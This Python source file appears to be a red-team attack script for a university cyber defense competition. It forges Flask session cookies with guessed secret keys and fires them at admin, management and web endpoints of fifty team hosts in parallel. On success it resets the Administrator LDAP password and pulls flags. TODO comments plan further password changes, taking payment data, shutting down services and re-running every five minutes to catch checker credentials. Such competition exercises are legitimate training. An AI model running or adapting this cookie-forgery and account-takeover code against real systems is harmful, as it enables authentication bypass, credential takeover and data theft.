import yaml
import argparse
import requests
import logging
import concurrent.futures

from exploit_module.admin_methods import check_fake_cookie_on_admin
from exploit_module.mgmt_methods import check_fake_cookie_on_mgmt, change_mgmt_password, get_mgmt_train_flag
from exploit_module.mgmt_methods import get_mgmt_bus_flag, get_mgmt_db_flag
from exploit_module.www_methods import check_fake_cookie_on_www
from exploit_module.common import create_cookie, make_data_dir, save_flag
from exploit_module.common import USER_AGENT

logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
_logger = logging.getLogger(__name__)

parser = argparse.ArgumentParser(description="Script to test for fake signed cookies and attempt to exploit them.")
parser.add_argument("--generate-yaml", action="store_true", help="Generate a config yaml file for all teams with default values.")
parser.add_argument("--config", type=str, default="team-data.yml", help="Path to the config yaml file. Default is team-data.yml")
parser.add_argument("--verbose", action="store_true", help="Enable verbose logging.")

def sign_in(username, password, domain="http://127.0.0.1:5000"):
    data = {
        "username": username,
        "password": password
    }
    data = requests.post(f"{domain}/auth/login", json=data, headers={"User-Agent": USER_AGENT})
    print(data.cookies)

def register_user(username, password, domain="http://127.0.0.1:5000"):
    data = {
        "username": username,
        "password": password
    }
    data = requests.post(f"{domain}/auth/register", json=data, headers={"User-Agent": USER_AGENT})
    print(data.text)


def run_with_cookie(username='trwbox', domain="http://127.0.0.1:5000"):
    cookie = create_cookie(username, secret_key='cdca')
    cookies = {
        "session": cookie
    }
    data = requests.get(f"{domain}/auth/test", cookies=cookies, headers={"User-Agent": USER_AGENT})
    print(data.text)

# TODO: Create a method that creates a user, then saves the cookie for that user in the event that the fake cookie does not work.


def run_admin_thread(domain: str):
    cookie_check = check_fake_cookie_on_admin(domain=domain)
    if cookie_check:
        _logger.info(f"[+] Fake cookie was accepted on admin endpoint at {domain}, attempting to change password")
        
    # TODO: Based on the fake signed cookie check, run a password change attempt on admin
    # TODO: Based on the fake signed cookie check, attempt to grab the bus and train flags
    # TODO: Based on the fake signed cookie check, attempt to shutdown service?

    # TODO: If the fake cookie does not work, check if we have a cookie already saved for the team and use that to try all the above
    # TODO: If we don't have a cookie, register a user and run the checks again to get the flags, and save the cookie for future use.

def run_mgmt_thread(domain: str):
    # TODO: Attempt to change the Administrator ldap password on the backend if the fake signed cookie is good
    cookie_check = check_fake_cookie_on_mgmt(domain=domain)
    if cookie_check:
        _logger.info(f"[+] Fake cookie was accepted on backend test endpoint at {domain}, attempting to change admin password")
        # This will default to changing the Administrator password
        change_mgmt_password(domain=domain)
        
        # Attempt to get the train, flag
        train_flag = get_mgmt_train_flag(domain=domain)
        if train_flag is not None:
            save_flag(domain, train_flag, type='train')
        
        # Attempt to get the bus flag
        bus_flag = get_mgmt_bus_flag(domain=domain)
        if bus_flag is not None:
            save_flag(domain, bus_flag, type='bus')
            
        # Attempt to get the db flag with the blue_user cookie, which should be able to access the db flag but not change the password
        blue_user_cookie = create_cookie(username='blue_flag', is_admin=False)
        db_flag = get_mgmt_db_flag(domain=domain, cookie=blue_user_cookie)
        if db_flag is not None:
            save_flag(domain, db_flag, type='db')
    else:
        _logger.debug(f"[-] Fake cookie was not accepted on backend test endpoint at {domain}, trying regular auth")
        # TODO: Register a user, then log in to get a valid cookie, and then attempt to get the flags with the valid cookie.
        
        # TODO: Attempt to create a user "blue_flag" and then log in with that user to get the db flag.
        
def run_www_thread(domain: str):
    # TODO: Based on the fake signed cookie check, run a password change attempt on frontend
    # TODO: Based on the fake signed cookie check, attempt to grab the payment info from the frontend
    cookie_check = check_fake_cookie_on_www(domain=domain)
    if cookie_check:
        _logger.info(f"[+] Fake cookie was accepted on frontend profile endpoint at {domain}, attempting to change password")

    # TODO: If the fake cookie does not work, check if we have a cookie already saved for the team and use that to try all the above
    # TODO: If we don't have a cookie, register a user and run the checks again to get the flags

# TODO: Multithread all of this so it can run in parallel across all 50 teams. I can use concurrent.futures for this.

# TODO: Since I am not sure that the times will be accurate for the cookies, I might be able to pull a cookie from the team, and use the 
# flask_unsign.session.get_serializer(secret_key='cdc', salt=flask_unsign.DEFAULT_SALT, legacy=False).loads(cookie, return_timestamp=True)[1]
# to get the timestamp of the cookie, and then use that timestamp to create a new cookie with the same timestamp

def generate_yaml_data():
    mgmt = []
    admin = []
    www = []
    for i in range(1, 51):
        mgmt.append(f"http://mgmt.team{i}.isucdc.com:5000")
        admin.append(f"http://admin.team{i}.isucdc.com")
        www.append(f"http://www.team{i}.isucdc.com")
    data = {
        'urls': {
            'mgmt': mgmt,
            'admin': admin,
            'www': www
        }
    }
    return data        

def load_yaml_data(config_path):
    try:
        with open(config_path, 'r') as f:
            data = yaml.safe_load(f)
        return data
    except Exception as e:
        _logger.error(f"Failed to load yaml config file at {config_path}. Using default config. Error: {e}")
        return generate_yaml_data()

def main():
    # Parse arguments
    args = parser.parse_args()
    
    if args.verbose:
        logging.getLogger().setLevel(logging.DEBUG)
    
    if args.generate_yaml:
        with open(args.config, 'w') as f:
            yaml.dump(generate_yaml_data(), f)
        _logger.info(f"Generated yaml config file at {args.config}")
        return

    make_data_dir()
    config_data = load_yaml_data(args.config)
    futures = []
    with concurrent.futures.ThreadPoolExecutor() as executor:
        for domain in config_data['urls']['admin']:
            _logger.debug(f"Submitting admin thread for {domain}")
            future = executor.submit(run_admin_thread, domain)
            futures.append(future)
        for domain in config_data['urls']['mgmt']:
            _logger.debug(f"Submitting mgmt thread for {domain}")
            future = executor.submit(run_mgmt_thread, domain)
            futures.append(future)
        for domain in config_data['urls']['www']:
            _logger.debug(f"Submitting www thread for {domain}")
            future = executor.submit(run_www_thread, domain)
            futures.append(future)
    
        for future in concurrent.futures.as_completed(futures):
            try:
                result = future.result()
            except Exception as e:
                _logger.error(f"Thread raised an exception: ({type(e)}): {e}")

    # TODO: Go into a while loop that triggers a run of the threads every 5 minutes so we can hit the creds that service checker uses.


if __name__ == "__main__":
    main()